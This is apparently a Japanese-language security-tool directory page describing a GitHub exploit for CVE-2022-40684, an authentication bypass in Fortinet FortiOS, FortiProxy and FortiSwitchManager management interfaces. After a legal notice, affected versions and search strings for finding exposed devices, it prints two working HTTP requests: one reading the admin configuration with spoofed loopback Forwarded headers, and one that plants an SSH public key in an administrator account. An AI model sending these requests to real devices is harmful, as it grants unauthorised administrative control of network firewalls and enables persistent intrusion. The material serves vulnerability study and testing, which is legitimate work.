Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-40684 — CVE-2022-40684のPoCとエクスプロイトは、Fortinet FortiOS、FortiProxy、およびFortiSwitchManagerの管理インターフェースにおける認証バイパスであり、巧妙に細工されたHTTPリクエストを介して不正な管理者アクセスを可能にします。 | Kitploit
ツール/GitHubGitHub/hughink/cve-2022-40684
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubhughink/cve-2022-40684

CVE-2022-40684

CVE-2022-40684のPoCとエクスプロイトは、Fortinet FortiOS、FortiProxy、およびFortiSwitchManagerの管理インターフェースにおける認証バイパスであり、巧妙に細工されたHTTPリクエストを介して不正な管理者アクセスを可能にします。

リポジトリを見る
113243年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-40684

法令遵守:

全ての個人及び組織は、ネットワークを利用する際、憲法及び法律を遵守し、公共の秩序を守り、社会の道徳を尊重し、ネットワークの安全を害してはならず、ネットワークを利用して国家安全、栄誉及び利益を害する行為を行ってはならない。

脆弱性の概要:

Fortinet(飛塔)は、世界的に有名なネットワークセキュリティ製品およびセキュリティソリューションプロバイダーであり、その製品にはファイアウォール、アンチウイルスソフトウェア、侵入防御システム、エンドポイントセキュリティコンポーネントなどが含まれます。影響を受けるFortiOS、FortiProxy、FortiSwitchManager製品の管理インターフェースでは、代替パスまたはチャネルを使用して認証をバイパスし、認証なしで特別に細工されたHTTPまたはHTTPSリクエストを介して管理インターフェースを操作することができます。

リスクレベル :

高

影響を受けるバージョン:

FortiOS 版本 7.2.0 - 7.2.1

FortiOS 版本 7.0.0 - 7.0.6

FortiProxy 版本 7.2.0

FortiProxy 版本 7.0.0 - 7.0.6

FortiSwitchManager 版本 7.2.0

FortiSwitchManager 版本 7.0.0

アセットの特定:

title="FortiProxy“

title="FortiGate"

脆弱性の再現:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

ツールをダウンロード